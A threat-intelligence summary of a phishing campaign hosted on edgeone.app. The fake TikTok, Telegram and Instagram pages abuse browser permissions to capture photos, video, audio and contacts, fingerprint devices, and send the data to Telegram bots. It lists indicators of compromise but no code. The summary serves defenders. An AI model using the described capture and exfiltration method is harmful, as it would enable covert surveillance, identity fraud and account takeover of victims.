Keypoints
- Campaign hosted primarily on edgeone.app using templated phishing pages to impersonate consumer platforms (TikTok, Telegram, Instagram, Google/Chrome, Flappy Bird).
- Attackers use browser permission prompts to capture camera images, record video and audio, enumerate device metadata, and request contact access via the Contacts Picker API.
- Captured media and telemetry are exfiltrated directly to attacker-controlled Telegram bots via the Telegram Bot API (api.telegram.org), removing the need for backend servers.
- Scripts perform extensive device fingerprinting (navigator.userAgent, platform, deviceMemory, hardwareConcurrency, connection, getBattery) and retrieve public IP/geolocation via services like api.ipify.org and ipapi.co.
- Indicators in the code (structured annotations and emoji-based message formatting) suggest potential use of generative AI to assist script development and message assembly.
- Collected data can be abused for identity fraud, bypassing video-KYC, targeted social engineering, account takeover, extortion, and creation of high-fidelity assets for deepfake/impersonation attacks.
MITRE Techniques
- [None ] No MITRE ATT&CK technique identifiers are explicitly referenced in the article β βCyble Research & Intelligence Labs (CRIL) has identified a widespread, highly active social engineering campaign hosted primarily on edgeone.app infrastructure.β
Indicators of Compromise
- [Domain ] Hosting and C2 infrastructure β edgeone.app (phishing landing pages), api.telegram.org (data exfiltration via Telegram Bot API)
- [API / Service Endpoints ] IP and geolocation enrichment services used β api.ipify.org (public IP lookup), ipapi.co (geolocation enrichment)
- [File types ] Exfiltrated multimedia formats observed β JPEG (canvas.toBlob output for photos), WebM (recorded audio/video files)
- [Browser API / Feature ] Client-side data collection vectors β Contacts Picker API (navigator.contacts.select) used to request contact names/numbers/emails; MediaRecorder / getUserMedia used for audio/video capture
Read more: https://cyble.com/blog/ai-assisted-phishing-campaign/